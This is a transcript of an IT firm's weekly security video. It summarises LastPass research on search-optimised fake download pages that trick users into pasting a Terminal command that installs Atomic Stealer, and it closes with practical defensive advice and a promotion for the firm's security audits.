LastPass is sounding the alarm after attackers have been found impersonating its brand in a widespread malware campaign. We’ll explain how hackers are using fake download pages to spread malware, why password managers are being impersonated, and how to ensure you don’t fall victim as we sit down and sync up with Rocket IT’s weekly technology update.

In this episode, you’ll hear more about:

• Fake download pages being pushed to the top of search results.
• How attackers use GitHub to hide malicious installers.
• What Atomic Stealer malware can grab from an infected device.
• Why password managers are prime targets for attackers.
• Quick, practical steps to protect your data.

Video Transcript

Security researchers at LastPass say attackers have set up fake download pages that look like they belong to well-known companies. What worse is that these pages have been optimized for search engines, so they’re appearing near the top of search engine results, sometimes even above the official sites they’re impersonating.

Clicking one of these malicious links redirects unsuspecting victims to a secondary site with installation instructions. In these steps, individuals are prompted to copy and paste a command into their device’s Terminal. That command runs a quick download tool, which fetches a malicious installer, rather than the application the user was hoping to download.

In the research conducted by LastPass, the software being delivered by these pages is called Atomic Stealer. This is essentially a subscription-based service that allows attackers to launch malware, steal data, obtain reports on stolen information, and keep a backdoor open on infected devices so attackers can continuously return without being caught.

Now, keep in mind that LastPass isn’t the only brand being impersonated in these campaigns. Branding from 1Password, Dropbox, Notion, Robinhood, Adobe, and more are being used to grow the campaign’s reach and encourage clicks. That said, password managers in particular are valuable targets because they store the keys to a person’s entire online life. If attackers can capture a master password, they can potentially unlock many accounts at once.

Additionally, it’s important to note that this attack has been built to scale. LastPass reports that threat actors are creating many deceptive pages, so takedown requests catch only a few at a time. When one is caught, automated code builds a new page, swaps domains, and optimizes it for search engines. That churn is currently what keeps the campaign resilient and makes manual takedowns an uphill battle.

So, what should you do right now? First, be careful with search results when you’re looking for software. Look to make sure the site you’re visiting is a well-known and trusted domain. Second, if a download page asks you to run a Terminal command, pause and verify it on the vendor’s official website. And if you don’t know what the command actually does, think twice before launching it. Next, centralize software installation in your organization and limit who can run privileged commands on work devices. Fourth, deploy multi-factor authentication policies so that if you do fall victim, you have another line of defense ready. And finally, when vendors like LastPass publish indicators of compromise, share them with your security team so they can check for related activity in your network.

For those organizations without a security team to fall back on, Rocket IT is here to help. Reach out using the link in this video’s description and a member of our team can schedule a security audit of your current network to ensure your people and systems are kept safe. And to stay up to date on technology news, hit that subscribe button and the bell to catch us on next week’s episode of Sync Up with Rocket IT.